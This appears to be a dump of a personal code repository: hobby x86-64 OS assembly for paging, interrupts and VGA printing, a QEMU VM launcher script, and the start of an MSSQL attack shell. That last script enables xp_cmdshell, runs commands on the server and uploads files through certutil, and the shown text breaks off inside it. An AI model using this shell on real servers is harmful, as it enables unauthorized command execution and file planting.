PAGE_PRESENT | PAGE_WRITE ; OR EAX with the flags (present flag, writable flag). 53 | mov [es:di], eax ; Store the value of EAX as the first PML4E. 54 | 55 | ; Build the Page Directory Pointer Table. 56 | lea eax, [es:di + 0x2000] ; Put the address of the Page Directory in to EAX. 57 | or eax, PAGE_PRESENT | PAGE_WRITE ; OR EAX with the flags (present flag, writable flag). 58 | mov [es:di + 0x1000], eax ; Store the value of EAX as the first PDPTE. 59 | 60 | ; Build the Page Directory. 61 | lea eax, [es:di + 0x3000] ; Put the address of the Page Table in to EAX. 
62 | or eax, PAGE_PRESENT | PAGE_WRITE ; OR EAX with the flags (present flag, writable flag). 63 | mov [es:di + 0x2000], eax ; Store to value of EAX as the first PDE. 64 | 65 | push di ; Save DI for the time being. 66 | lea di, [di + 0x3000] ; Point DI to the page table. 67 | mov eax, PAGE_PRESENT | PAGE_WRITE ; Move the flags into EAX - and point it to 0x0000. 68 | 69 | ; Build the Page Table. 70 | .LoopPageTable: 71 | mov [es:di], eax 72 | add eax, 0x1000 73 | add di, 8 74 | cmp eax, 0x200000 ; If we did all 2MiB, end. 75 | jb .LoopPageTable 76 | 77 | pop di ; Restore DI. 78 | ret 79 | -------------------------------------------------------------------------------- /os/part3/kernel/isr.asm: -------------------------------------------------------------------------------- 1 | ; INTERRUPT SERVICE ROUTINES 2 | 3 | BITS 64 4 | 5 | ;---Initialized data---------------------------------------------------------- 6 | systimer_ticks dq 0 7 | keyboard_scancode dq 0 8 | error_code_low dw 0 9 | error_code_high dw 0 10 | 11 | int_message dw 17 12 | db 'Interrupt raised!' 13 | 14 | division_by_zero_message dw 17 15 | db 'Division by zero!' 16 | 17 | gpf_message dw 25 18 | db 'General Protection Fault!' 19 | 20 | pf_message dw 11 21 | db 'Page Fault!' 22 | 23 | 24 | ;---Code------------------------------------------------------------------------ 25 | ISR_dummy: 26 | ;***************************************************************************; 27 | ; Just a dummy generic handler. It prints the message "Interrupt raised!". 
; 28 | ;***************************************************************************; 29 | cli 30 | push rax 31 | push r8 32 | push r9 33 | push rsi 34 | mov ah, (VGA_COLOR_RED << 4) | VGA_COLOR_LIGHT_BROWN 35 | mov r8, 1 36 | mov r9, 1 37 | mov rsi, int_message 38 | Call Print 39 | pop rsi 40 | pop r9 41 | pop r8 42 | pop rax 43 | .halt: hlt 44 | jmp .halt ; Infinite loop (interrupts are disabled, so hlt never wakes; the iretq below is unreachable). 45 | iretq 46 | 47 | 48 | ISR_Division_by_Zero: 49 | ;***************************************************************************; 50 | ; Division by zero handler ; 51 | ;***************************************************************************; 52 | cli 53 | push rax 54 | push r8 55 | push r9 56 | push rsi 57 | mov ah, (VGA_COLOR_RED << 4) | VGA_COLOR_LIGHT_BROWN 58 | mov r8, 1 59 | mov r9, 1 60 | mov rsi, division_by_zero_message 61 | Call Print 62 | pop rsi 63 | pop r9 64 | pop r8 65 | pop rax 66 | .halt: hlt 67 | jmp .halt ; Infinite loop (the iretq below is unreachable). 68 | iretq 69 | 70 | 71 | ISR_GPF: 72 | ;***************************************************************************; 73 | ; General Protection Fault handler ; 74 | ;***************************************************************************; 75 | ; NOTE(review): #GP pushes an error code on the stack and this handler never pops it. That is harmless only because it halts below; the iretq at the end would misread the frame if it were ever reached. ; 76 | cli 77 | push rax 78 | push r8 79 | push r9 80 | push rsi 81 | mov ah, (VGA_COLOR_RED << 4) | VGA_COLOR_LIGHT_BROWN 82 | mov r8, 1 83 | mov r9, 1 84 | mov rsi, gpf_message 85 | Call Print 86 | pop rsi 87 | pop r9 88 | pop r8 89 | pop rax 90 | .halt: hlt 91 | jmp .halt ; Infinite loop (the iretq below is unreachable). 92 | iretq 93 | 94 | 95 | ISR_Page_Fault: 96 | ;***************************************************************************; 97 | ; Page Fault handler ; 98 | ;***************************************************************************; 99 | cli 100 | pop word [error_code_high] ; NOTE(review): in long mode the error code occupies a full 8-byte stack slot. This first pop takes bits 0-15 of it (the LOW half, despite the name) 101 | pop word [error_code_low] ; and this one bits 16-31; the remaining 4 bytes of the slot stay on the stack. Harmless while the handler halts, but iretq would fault if ever reached. 102 | push rax 103 | push r8 104 | push r9 105 | push rsi 106 | mov ah, (VGA_COLOR_RED << 4) | VGA_COLOR_LIGHT_BROWN 107 | mov r8, 1 108 | mov r9, 1 109 | mov rsi, pf_message 110 | call Print 111 | pop rsi 112 | pop r9 113 | pop r8 
113 | pop rax 114 | .halt: hlt 115 | jmp .halt ; Infinite loop 116 | iretq 117 | 118 | 119 | ISR_systimer: 120 | ;*****************************************************************************; 121 | ; System Timer Interrupt Service Routine (IRQ0 mapped to INT 0x20) ; 122 | ;*****************************************************************************; 123 | push rax 124 | inc qword [systimer_ticks] 125 | mov al, PIC_EOI ; Send EOI (End of Interrupt) command 126 | out PIC1_COMMAND, al 127 | pop rax 128 | iretq 129 | 130 | 131 | ISR_keyboard: 132 | ;*****************************************************************************; 133 | ; Keyboard Controller Interrupt Service Routine (IRQ1 mapped to INT 0x21) ; 134 | ;*****************************************************************************; 135 | push rax 136 | xor rax, rax 137 | in al, 0x60 ; MUST read byte from keyboard (else no more interrupts). 138 | mov [keyboard_scancode], al 139 | mov al, PIC_EOI ; Send EOI (End of Interrupt) command 140 | out PIC1_COMMAND, al 141 | pop rax 142 | iretq 143 | -------------------------------------------------------------------------------- /vms/vm_new: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | if [ $# -lt 1 ] 4 | then 5 | echo "Usage: $0 [android|gsm|macos|parrot|win10] [extra options]" 6 | exit 7 | fi 8 | 9 | case $1 in 10 | "android" ) 11 | set -x 12 | qemu-system-x86_64 -name "android" \ 13 | -machine accel=kvm -cpu host -smp 4,sockets=1,cores=2,threads=2 -m 2G \ 14 | -drive file=/mnt/SSD/android.qcow2,if=virtio \ 15 | -netdev type=user,id=mynet0,net=192.168.250.0/24,hostfwd=tcp::2222-:22 -device virtio-net-pci,netdev=mynet0 \ 16 | -display sdl,gl=on -device virtio-vga,virgl=on \ 17 | -device qemu-xhci -device usb-tablet \ 18 | -audiodev alsa,id=snd0 -device es1370,audiodev=snd0 \ 19 | -boot once=c,menu=off \ 20 | "${@:2}" 21 | set +x;; 22 | "gsm" ) 23 | set -x 24 | qemu-system-x86_64 -name "gsm" \ 25 | -machine 
accel=kvm -cpu host -smp 4,sockets=1,cores=2,threads=2 -m 4G \ 26 | -bios /mnt/SSD/FIRMWARE/edk2-ovmf/OVMF_CODE.fd \ 27 | -drive file=/mnt/SSD/gsm.qcow2,if=virtio \ 28 | -netdev type=user,id=mynet0,net=192.168.250.0/24,hostfwd=tcp::9022-:22,hostfwd=tcp::9080-:80,hostfwd=tcp::9443-:443 -device virtio-net-pci,netdev=mynet0 \ 29 | -nographic \ 30 | -device qemu-xhci -device usb-tablet \ 31 | -audiodev alsa,id=snd0 -device AC97,audiodev=snd0 \ 32 | -boot once=c,menu=off \ 33 | -device virtio-serial-pci -spice unix,addr=/home/alamot/.cache/qemu/gsm/spice.sock,disable-ticketing \ 34 | -device virtserialport,chardev=spicechannel0,name=com.redhat.spice.0 -chardev spicevmc,id=spicechannel0,name=vdagent \ 35 | "${@:2}" 36 | set +x;; 37 | "macos" ) 38 | set -x 39 | qemu-system-x86_64 -name "macos" \ 40 | -machine q35,accel=kvm -nodefaults -smp 4,sockets=1,cores=2,threads=2 -m 4G \ 41 | -cpu Penryn,vendor=GenuineIntel,kvm=on,+sse3,+sse4.2,+aes,+xsave,+avx,+xsaveopt,+avx2,+bmi2,+smep,+bmi1,+fma,+movbe,+invtsc \ 42 | -device isa-applesmc,osk="ourhardworkbythesewordsguardedpleasedontsteal(c)AppleComputerInc" -smbios type=2 \ 43 | -drive if=pflash,format=raw,readonly,file="/mnt/SSD/FIRMWARE/MACOS/OVMF_CODE.fd" \ 44 | -drive if=pflash,format=raw,file="/mnt/SSD/FIRMWARE/MACOS/OVMF_VARS-1024x768.fd" \ 45 | -drive id=ESP,if=virtio,format=qcow2,file=/mnt/SSD/FIRMWARE/MACOS/ESP.qcow2 \ 46 | -drive id=MyDisk,if=virtio,format=qcow2,file=/mnt/SSD/macos.qcow2 \ 47 | -netdev type=user,id=net0,net=192.168.250.0/24,hostfwd=tcp::2022-:22 -device vmxnet3,netdev=net0,id=net0,mac=46:3a:09:e6:f6:21 \ 48 | -display spice-app -vga none -device qxl-vga,vgamem_mb=32 \ 49 | -usb -device usb-kbd -device usb-tablet \ 50 | -audiodev alsa,id=snd0 -device ich9-intel-hda -device hda-output,audiodev=snd0 \ 51 | "${@:2}" 52 | set +x;; 53 | "parrot" ) 54 | set -x 55 | qemu-system-x86_64 -name "parrot" \ 56 | -machine accel=kvm -cpu host -smp 4,sockets=1,cores=2,threads=2 -m 3G \ 57 | -drive 
file=/mnt/SSD/parrot.qcow2,if=virtio \ 58 | -netdev type=user,id=mynet0,net=192.168.250.0/24,hostfwd=tcp::2222-:22 -device virtio-net-pci,netdev=mynet0 \ 59 | -display spice-app -vga none -device qxl-vga,vgamem_mb=32 \ 60 | -device qemu-xhci -device usb-tablet \ 61 | -audiodev alsa,id=snd0 -device AC97,audiodev=snd0 \ 62 | -boot once=c,menu=off \ 63 | -device virtio-serial-pci -spice unix,addr=/home/alamot/.cache/qemu/parrot/spice.sock,disable-ticketing \ 64 | -device virtserialport,chardev=spicechannel0,name=com.redhat.spice.0 -chardev spicevmc,id=spicechannel0,name=vdagent \ 65 | "${@:2}" 66 | set +x;; 67 | "win10" ) 68 | set -x 69 | qemu-system-x86_64 -name "win10" \ 70 | -machine accel=kvm -cpu host -smp 4,sockets=1,cores=2,threads=2 -m 4G \ 71 | -bios /mnt/SSD/FIRMWARE/edk2-ovmf/OVMF_CODE.fd \ 72 | -drive file=/mnt/SSD/win10.qcow2,if=virtio \ 73 | -netdev type=user,id=mynet0,net=192.168.250.0/24,hostfwd=tcp::22222-:22 -device virtio-net-pci,netdev=mynet0 \ 74 | -display spice-app -vga none -device qxl-vga,vgamem_mb=32 \ 75 | -device qemu-xhci -device usb-tablet \ 76 | -audiodev alsa,id=snd0 -device ich9-intel-hda -device hda-output,audiodev=snd0 \ 77 | -rtc base=localtime \ 78 | -boot once=c,menu=off \ 79 | -device virtio-serial-pci -spice unix,addr=/home/alamot/.cache/qemu/win10/spice.sock,disable-ticketing \ 80 | -device virtserialport,chardev=spicechannel0,name=com.redhat.spice.0 -chardev spicevmc,id=spicechannel0,name=vdagent \ 81 | "${@:2}" 82 | esac 83 | -------------------------------------------------------------------------------- /os/part5/stage2/paging.asm: -------------------------------------------------------------------------------- 1 | ; Author: Alamot 2 | 3 | BITS 16 4 | 5 | ;---Constants------------------------------------------------------------------- 6 | PAGE_PRESENT equ (1 << 0) ; Bit 0 => Page present 7 | PAGE_WRITE equ (1 << 1) ; Bit 1 => Page writable 8 | PAGE_PS equ (1 << 7) ; Bit 7 => 2MB page size, ignore PT 9 | PAGING_DATA equ 
0xF000 ; Address to store the paging tables
; NOTE(review): everything below runs in BITS 16 and reaches the tables through
; 16-bit DI (rep stosd, [es:di + 0x1000], [es:di + 0x2000], lea di). With the
; buffer at 0xF000 the 16KiB zero-fill and the +0x1000/+0x2000 offsets cross the
; 64KiB wrap, so the PDPT and PD are not placed at 0xF000+0x1000/+0x2000 as the
; comments in Prepare_paging describe. Confirm what ES holds when this runs and
; where the tables really land; a base that keeps the whole 16KiB below 0x10000
; (<= 0xC000) would avoid the question.
; RPL (Requestor Privilege Level - Bits 1-0): 0 is highest, 3 is lowest
; TI (Table Indicator - Bit 2): 0 => GDT, 1 => LDT
; Index (Bits 15-3): The index of the segment descriptor within the GDT.
; Segment Selector = (Index * 8) + (TI * 4) + RPL = (1 * 8) + (0 * 4) + 0 = 8
CODE_SEG equ 8

;---Initialized data------------------------------------------------------------

;****************************************************************************************;
; Global Descriptor Table (GDT)                                                          ;
;****************************************************************************************;
; The Global Descriptor Table (GDT) is a data structure used by x86-family processors    ;
; (starting with the 80286) in order to define the characteristics of the various memory ;
; areas (segments) used during program execution, including the base address, the size,  ;
; and access privileges like executability and writability.                              ;
;----------------------------------------------------------------------------------------;
; Only two descriptors are defined: a 64-bit code segment (selector 8 = CODE_SEG) and a  ;
; 64-bit data segment (selector 16). Both have DPL 0, so everything that runs with these ;
; selectors runs at ring 0; there is no user-mode segment yet.                           ;
;****************************************************************************************;
GDT:
.Null:
    dq 0x0000000000000000 ; Null Descriptor (should be present).
.Code:
    dq 0x00209A0000000000 ; 64-bit code descriptor (exec/read).
    dq 0x0000920000000000 ; 64-bit data descriptor (read/write).
    ALIGN 4
    dw 0 ; Padding (to make the "address of the GDT" field aligned on a 4-byte boundary).
.Pointer:
    dw $ - GDT - 1 ; 16-bit Size (Limit) of GDT.
    dd GDT ; 32-bit Base Address of GDT. (CPU will zero extend to 64-bit)


;---Code------------------------------------------------------------------------
Prepare_paging:
;******************************************************************************;
; Prepare paging                                                               ;
;------------------------------------------------------------------------------;
; ES:EDI Should point to a valid 4096-aligned 16KiB buffer.                    ;
; SS:ESP Should point to memory that can be used as a small stack.             ;
;------------------------------------------------------------------------------;
; Builds a 4-level identity map of the first 1 GiB using 2 MiB pages:          ;
;   PML4[0] -> PDPT[0] -> PD[0..511], PD[i] = i * 2MiB | P | RW | PS           ;
; Clobbers eax, ebx, ecx, edi and the direction flag (cld).                    ;
;******************************************************************************;
    mov edi, PAGING_DATA ; Point to 16KiB buffer for the paging structures.
                         ; Note: only EDI is loaded here; ES is whatever the caller
                         ; left in it, even though the header lists ES:EDI as input.
    ; Zero out the entire 16KiB buffer (PML4, PDPT, PD, unused PT)
    push di ; Store di (rep stosd alters di).
    mov ecx, 0x1000 ; Count should be 16384 / 4 = 4096 dwords
                    ; (16-bit addressing: the counter actually used is CX, which 0x1000 fits)
    xor eax, eax
    cld
    rep stosd
    pop di ; Restore di
    ; Build the PML4 (Page Map Level 4): PML4[0] -> PDPT
    lea eax, [es:di + 0x1000] ; eax = address of the PDPT
                              ; (the es: override has no effect on lea; eax is the
                              ; 16-bit effective address zero-extended, not ES:DI)
    or eax, PAGE_PRESENT | PAGE_WRITE ; Set the flags (present and writable)
    mov [es:di], eax ; PML4E[0] = eax
    ; Build the PDPT (Page Directory Pointer Table): PDPT[0] -> PD
    lea eax, [es:di + 0x2000] ; eax = address of the PD
    or eax, PAGE_PRESENT | PAGE_WRITE ; Set the flags (present and writable)
    mov [es:di + 0x1000], eax ; PDPT[0] = eax
    ; Fill the PD (Page Directory) with 512 entries (each maps a 2 MiB page)
    lea di, [di + 0x2000] ; DI now points to start of Page Directory
    xor ebx, ebx ; EBX = page index (0 to 511)
    mov ecx, 512 ; Number of 2 MiB pages to map
.MapLoop:
    mov eax, ebx ; Compute physical address: ebx * 0x200000
    shl eax, 21 ; 2^21 = 0x200000 = 2 MiB
    ; Set flags: Present, Writable, PS=1 (2 MiB page)
    ; Security note: U/S (bit 2) stays clear, so these pages are supervisor-only,
    ; but every page is both writable and executable (NX lives in bit 63 of the
    ; high dword, which is written as 0 below) - there is no W^X separation yet.
    or eax, PAGE_PRESENT | PAGE_WRITE | PAGE_PS
    mov [es:di], eax ; Store low 32 bits (each entry is 8 bytes)
    mov [es:di + 4], dword 0 ; Store high 32 bits (0 => identity mapping)
    add di, 8 ; Advance to next entry
    inc ebx ; Increment index
    loop .MapLoop
    ret
; --------------------------------------------------------------------------------
; /os/part3/kernel/video.asm:
; --------------------------------------------------------------------------------
BITS 64

;---Initialized data----------------------------------------------------------------
VRAM dq 0xB8000 ; Physical address of the 80x25 colour text-mode buffer (identity-mapped).

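;---Constants-----------------------------------------------------------------------
VGA_WIDTH equ 80
VGA_HEIGHT equ 25
; Colors
VGA_COLOR_BLACK equ 0
VGA_COLOR_BLUE equ 1
VGA_COLOR_GREEN equ 2
VGA_COLOR_CYAN equ 3
VGA_COLOR_RED equ 4
VGA_COLOR_MAGENTA equ 5
VGA_COLOR_BROWN equ 6
VGA_COLOR_LIGHT_GREY equ 7
VGA_COLOR_DARK_GREY equ 8
VGA_COLOR_LIGHT_BLUE equ 9
VGA_COLOR_LIGHT_GREEN equ 10
VGA_COLOR_LIGHT_CYAN equ 11
VGA_COLOR_LIGHT_RED equ 12
VGA_COLOR_LIGHT_MAGENTA equ 13
VGA_COLOR_LIGHT_BROWN equ 14
VGA_COLOR_WHITE equ 15


;---Code---------------------------------------------------------------------------
Fill_screen:
;*********************************************************************************;
; Fill screen                                                                     ;
;---------------------------------------------------------------------------------;
; rax (XY__XY__XY__XY__): X -> Background color, Y -> Character color             ;
; rax (__ZZ__ZZ__ZZ__ZZ): ASCII code(s) of character(s) to use to fill the screen ;
;---------------------------------------------------------------------------------;
; Writes exactly VGA_WIDTH*VGA_HEIGHT cells (4000 bytes) starting at VRAM.        ;
; rdi and rcx are preserved (the previous version left them clobbered).           ;
;*********************************************************************************;
    push rdi
    push rcx
    mov rdi, [abs VRAM]
    mov rcx, VGA_WIDTH*VGA_HEIGHT*2/8 ; 80*25 cells * 2 bytes / 8 = 500 qwords (4 cells each).
    rep stosq                         ; Fill the entire screen.
    pop rcx
    pop rdi
    ret


Print:
;**********************************************************************************;
; Prints a string at a 1-based (x, y) cell of the text-mode screen                ;
;----------------------------------------------------------------------------------;
; rsi: pointer to string (first 16 bits = the number of characters in the string.) ;
; ah:  Color attributes                                                            ;
; r8:  x (1..VGA_WIDTH)                                                            ;
; r9:  y (1..VGA_HEIGHT)                                                           ;
;----------------------------------------------------------------------------------;
; All registers are preserved. Output is clamped to the 80x25 buffer: a length of  ;
; 0 prints nothing (LOOP with rcx=0 would otherwise iterate 2^64 times) and a      ;
; string that would run past the end of VRAM is truncated instead of overwriting   ;
; whatever follows 0xB8000+4000.                                                   ;
;**********************************************************************************;
    push rax
    push rcx
    push rdx
    push rsi
    push rdi
    push r8
    push r9
    dec r8                      ; 1-based column -> 0-based
    add r8, r8                  ; each cell is 2 bytes (character + attribute)
    dec r9                      ; 1-based row -> 0-based
    mov rdi, [abs VRAM]

    push rax                    ; mul clobbers rax (rdx too, but it is already saved)
    mov rax, VGA_WIDTH*2
    mul r9                      ; rax = row * bytes per row
    add r8, rax                 ; r8 = byte offset of the first cell from VRAM
    pop rax
    movzx rcx, word [rsi]       ; rcx = string length (zero-extend first 16 bits)
    add rsi, 2
    jrcxz .done                 ; empty string: nothing to print (and avoid LOOP wrap-around)
    mov rdx, VGA_WIDTH*VGA_HEIGHT*2
    sub rdx, r8                 ; rdx = bytes left between the first cell and end of VRAM
    jbe .done                   ; first cell already off-screen (also catches x or y = 0)
    shr rdx, 1                  ; ... expressed in cells
    cmp rcx, rdx
    cmova rcx, rdx              ; never write past the end of the text buffer
.string_loop:                   ; Print all the characters in the string.
    lodsb                       ; al = [rsi], rsi++
    mov [rdi+r8], ax            ; Write attributes (ah) + character (al) to VRAM.
    add rdi, 2                  ; Move to next word in VRAM
    loop .string_loop           ; rcx--, jnz
.done:
    pop r9
    pop r8
    pop rdi
    pop rsi
    pop rdx
    pop rcx
    pop rax
    ret


Print_hex:
;**********************************************************************************;
; Prints a 16-digit hexadecimal value                                              ;
;----------------------------------------------------------------------------------;
; r10: value to be printed                                                         ;
; ah:  Color attributes                                                            ;
; r8/r9: position, passed through to Print                                         ;
;----------------------------------------------------------------------------------;
; Builds "0x" + 16 upper-case hex digits in a 20-byte stack buffer laid out as     ;
; Print expects (16-bit length, then the characters) and hands it to Print.        ;
;**********************************************************************************;
    push rcx
    push rsi
    push r10
    sub rsp, 20                 ; make space for the string length (2 bytes) and 18 characters
    mov rsi, rsp
    push rsi                    ; store rsi (string address)
    mov [rsi], word 18          ; string length = 18 ("0x" + 16 digits)
    mov [rsi+2], word "0x"
    add rsi, 19                 ; point rsi to the last character of the string
    mov ecx, 16                 ; loop 16 times (one for each digit), least significant first
.digit:
    push r10                    ; store r10 (the nibble extraction below destroys it)
    and r10, 0Fh                ; isolate digit
    add r10b,'0'                ; convert to ascii
    cmp r10b,'9'                ; is hex?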
107 | jbe .nohex 108 | add r10b, 7 ; hex 109 | .nohex: 110 | mov [rsi], byte r10b ; store result 111 | dec rsi ; next position 112 | pop r10 ; restore rax 113 | shr r10, 4 ; right shift by 4 114 | loop .digit 115 | pop rsi ; restore rsi (string address) 116 | call Print 117 | add rsp, 20 118 | pop r10 119 | pop rsi 120 | pop rcx 121 | ret 122 | -------------------------------------------------------------------------------- /os/part4/kernel/video.asm: -------------------------------------------------------------------------------- 1 | BITS 64 2 | 3 | ;---Initialized data---------------------------------------------------------------- 4 | VRAM dq 0xB8000 5 | 6 | ;---Constants----------------------------------------------------------------------- 7 | VGA_WIDTH equ 80 8 | VGA_HEIGHT equ 25 9 | ; Colors 10 | VGA_COLOR_BLACK equ 0 11 | VGA_COLOR_BLUE equ 1 12 | VGA_COLOR_GREEN equ 2 13 | VGA_COLOR_CYAN equ 3 14 | VGA_COLOR_RED equ 4 15 | VGA_COLOR_MAGENTA equ 5 16 | VGA_COLOR_BROWN equ 6 17 | VGA_COLOR_LIGHT_GREY equ 7 18 | VGA_COLOR_DARK_GREY equ 8 19 | VGA_COLOR_LIGHT_BLUE equ 9 20 | VGA_COLOR_LIGHT_GREEN equ 10 21 | VGA_COLOR_LIGHT_CYAN equ 11 22 | VGA_COLOR_LIGHT_RED equ 12 23 | VGA_COLOR_LIGHT_MAGENTA equ 13 24 | VGA_COLOR_LIGHT_BROWN equ 14 25 | VGA_COLOR_WHITE equ 15 26 | 27 | 28 | ;---Code--------------------------------------------------------------------------- 29 | Fill_screen: 30 | ;*********************************************************************************; 31 | ; Fill screen ; 32 | ;---------------------------------------------------------------------------------; 33 | ; rax (XY__XY__XY__XY__): X -> Background color, Y -> Character color ; 34 | ; rax (__ZZ__ZZ__ZZ__ZZ): ASCII code(s) of character(s) to use to fill the screen ; 35 | ;*********************************************************************************; 36 | mov rdi, [abs VRAM] 37 | mov rcx, 500 ; 80*25 / 4 = 500 (we set 4 characters each time). 38 | rep stosq ; Clear the entire screen. 
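; (end of Fill_screen, whose body begins on the previous line)
    ret


Print:
;**********************************************************************************;
; Prints a string at a 1-based (x, y) cell of the text-mode screen                ;
;----------------------------------------------------------------------------------;
; rsi: pointer to string (first 16 bits = the number of characters in the string.) ;
; ah:  Color attributes                                                            ;
; r8:  x (1..VGA_WIDTH)                                                            ;
; r9:  y (1..VGA_HEIGHT)                                                           ;
;----------------------------------------------------------------------------------;
; All registers are preserved. Output is clamped to the 80x25 buffer: a length of  ;
; 0 prints nothing (LOOP with rcx=0 would otherwise iterate 2^64 times) and a      ;
; string that would run past the end of VRAM is truncated instead of overwriting   ;
; whatever follows 0xB8000+4000.                                                   ;
;**********************************************************************************;
    push rax
    push rcx
    push rdx
    push rsi
    push rdi
    push r8
    push r9
    dec r8                      ; 1-based column -> 0-based
    add r8, r8                  ; each cell is 2 bytes (character + attribute)
    dec r9                      ; 1-based row -> 0-based
    mov rdi, [abs VRAM]

    push rax                    ; mul clobbers rax (rdx too, but it is already saved)
    mov rax, VGA_WIDTH*2
    mul r9                      ; rax = row * bytes per row
    add r8, rax                 ; r8 = byte offset of the first cell from VRAM
    pop rax
    movzx rcx, word [rsi]       ; rcx = string length (zero-extend first 16 bits)
    add rsi, 2
    jrcxz .done                 ; empty string: nothing to print (and avoid LOOP wrap-around)
    mov rdx, VGA_WIDTH*VGA_HEIGHT*2
    sub rdx, r8                 ; rdx = bytes left between the first cell and end of VRAM
    jbe .done                   ; first cell already off-screen (also catches x or y = 0)
    shr rdx, 1                  ; ... expressed in cells
    cmp rcx, rdx
    cmova rcx, rdx              ; never write past the end of the text buffer
.string_loop:                   ; Print all the characters in the string.
    lodsb                       ; al = [rsi], rsi++
    mov [rdi+r8], ax            ; Write attributes (ah) + character (al) to VRAM.
    add rdi, 2                  ; Move to next word in VRAM
    loop .string_loop           ; rcx--, jnz
.done:
    pop r9
    pop r8
    pop rdi
    pop rsi
    pop rdx
    pop rcx
    pop rax
    ret


Print_hex:
;**********************************************************************************;
; Prints a 16-digit hexadecimal value                                              ;
;----------------------------------------------------------------------------------;
; r10: value to be printed                                                         ;
; ah:  Color attributes                                                            ;
; r8/r9: position, passed through to Print                                         ;
;----------------------------------------------------------------------------------;
; Builds "0x" + 16 upper-case hex digits in a 20-byte stack buffer laid out as     ;
; Print expects (16-bit length, then the characters) and hands it to Print.        ;
;**********************************************************************************;
    push rcx
    push rsi
    push r10
    sub rsp, 20                 ; make space for the string length (2 bytes) and 18 characters
    mov rsi, rsp
    push rsi                    ; store rsi (string address)
    mov [rsi], word 18          ; string length = 18 ("0x" + 16 digits)
    mov [rsi+2], word "0x"
    add rsi, 19                 ; point rsi to the last character of the string
    mov ecx, 16                 ; loop 16 times (one for each digit), least significant first
.digit:
    push r10                    ; store r10 (the nibble extraction below destroys it)
    and r10, 0Fh                ; isolate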
digit 105 | add r10b,'0' ; convert to ascii 106 | cmp r10b,'9' ; is hex? 107 | jbe .nohex 108 | add r10b, 7 ; hex 109 | .nohex: 110 | mov [rsi], byte r10b ; store result 111 | dec rsi ; next position 112 | pop r10 ; restore rax 113 | shr r10, 4 ; right shift by 4 114 | loop .digit 115 | pop rsi ; restore rsi (string address) 116 | call Print 117 | add rsp, 20 118 | pop r10 119 | pop rsi 120 | pop rcx 121 | ret 122 | -------------------------------------------------------------------------------- /mssql/mssql_shell.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | from __future__ import print_function 3 | # Author: Alamot 4 | # Use pymssql >= 1.0.3 (otherwise it doesn't work correctly) 5 | # To upload a file, type: UPLOAD local_path remote_path 6 | # e.g. UPLOAD myfile.txt C:\temp\myfile.txt 7 | # If you omit the remote_path it uploads the file on the current working folder. 8 | # Be aware that pymssql has some serious memory leak issues when the connection fails (see: https://github.com/pymssql/pymssql/issues/512). 
try:
    import _mssql
except:
    # Bare except: catches everything (including KeyboardInterrupt) just to fall
    # back to the pymssql-bundled module. `except ImportError:` is the intended scope.
    from pymssql import _mssql
import base64
import shlex
import sys
import tqdm
import hashlib
from io import open
try: input = raw_input
except NameError: pass


# NOTE(review): credentials are hard-coded in source. The password below is a
# placeholder; fill these in at run time (prompt / environment) rather than
# committing real values, and never leave a real password in a shared repo.
MSSQL_SERVER = "10.10.10.10"
MSSQL_USERNAME = "Domain\\sa_user"
MSSQL_PASSWORD = "**********"
BUFFER_SIZE = 5*1024   # characters of base64 sent per xp_cmdshell echo (must fit a cmd.exe line)
TIMEOUT = 30           # defined but not used by the code below


def process_result(mssql):
    """Print the output rows of the last xp_cmdshell call and return (username, computername, cwd).

    Every command is suffixed with `echo %username%^|%COMPUTERNAME% & cd`, so the
    last three rows are expected to be: "user|host", the current directory, and a
    trailing NULL row. Those three are not printed; everything before them is.
    If fewer than three rows came back, empty strings are returned.
    """
    username = ""
    computername = ""
    cwd = ""
    rows = list(mssql)
    for row in rows[:-3]:
        columns = list(row)
        # Each row is a dict keyed by column name/index; the last key holds the text.
        if row[columns[-1]]:
            print(row[columns[-1]])
        else:
            print()
    if len(rows) >= 3:
        (username, computername) = rows[-3][list(rows[-3])[-1]].split('|')
        cwd = rows[-2][list(rows[-3])[-1]]
    return (username.rstrip(), computername.rstrip(), cwd.rstrip())


def upload(mssql, stored_cwd, local_path, remote_path):
    """Copy a local file to the server by echoing base64 chunks into remote_path + '.b64'
    and decoding it with certutil, then verify the MD5 of the decoded file.

    MD5 is used only as an integrity check against transfer corruption, not as a
    security property. The remote '.b64' file is left behind after decoding.
    """
    print("Uploading "+local_path+" to "+remote_path)
    cmd = 'type nul > "' + remote_path + '.b64"'
    mssql.execute_query("EXEC xp_cmdshell '"+cmd+"'")

    with open(local_path, 'rb') as f:
        data = f.read()
        md5sum = hashlib.md5(data).hexdigest()
        # base64.encodestring was removed in Python 3.9 (use base64.encodebytes there);
        # the split/join strips the newlines it inserts every 76 characters.
        b64enc_data = b"".join(base64.encodestring(data).split()).decode()

    # On Python 3 this division is a float, so the message shows e.g. "12.5KB".
    print("Data length (b64-encoded): "+str(len(b64enc_data)/1024)+"KB")
    for i in tqdm.tqdm(range(0, len(b64enc_data), BUFFER_SIZE), unit_scale=BUFFER_SIZE/1024, unit="KB"):
        cmd = 'echo '+b64enc_data[i:i+BUFFER_SIZE]+' >> "' + remote_path + '.b64"'
        mssql.execute_query("EXEC xp_cmdshell '"+cmd+"'")
        #print("Remaining: "+str(len(b64enc_data)-i))

    cmd = 'certutil -decode "' + remote_path + '.b64" "' + remote_path + '"'
    mssql.execute_query("EXEC xp_cmdshell 'cd "+stored_cwd+" & "+cmd+" & echo %username%^|%COMPUTERNAME% & cd'")
    process_result(mssql)
    cmd = 'certutil -hashfile "' + remote_path + '" MD5'
    mssql.execute_query("EXEC xp_cmdshell 'cd "+stored_cwd+" & "+cmd+" & echo %username%^|%COMPUTERNAME% & cd'")
    # certutil prints the hash on its own line; look for it among the returned rows.
    if md5sum in [row[list(row)[-1]].strip() for row in mssql if row[list(row)[-1]]]:
        print("MD5 hashes match: " + md5sum)
    else:
        print("ERROR! MD5 hashes do NOT match!")


def shell():
    """Interactive loop: connect, enable xp_cmdshell, then run each typed line through it.

    Enabling xp_cmdshell via sp_configure is a configuration change on the server
    that is normally audited/alerted on; hardened servers keep it disabled and
    restrict who holds the permission to change it. Only the single quote is
    escaped in the typed command, so the text is otherwise passed verbatim.
    """
    mssql = None
    stored_cwd = None
    try:
        mssql = _mssql.connect(server=MSSQL_SERVER, user=MSSQL_USERNAME, password=MSSQL_PASSWORD)
        print("Successful login: "+MSSQL_USERNAME+"@"+MSSQL_SERVER)

        print("Trying to enable xp_cmdshell ...")
        mssql.execute_query("EXEC sp_configure 'show advanced options',1;RECONFIGURE;exec SP_CONFIGURE 'xp_cmdshell',1;RECONFIGURE")

        cmd = 'echo %username%^|%COMPUTERNAME% & cd'
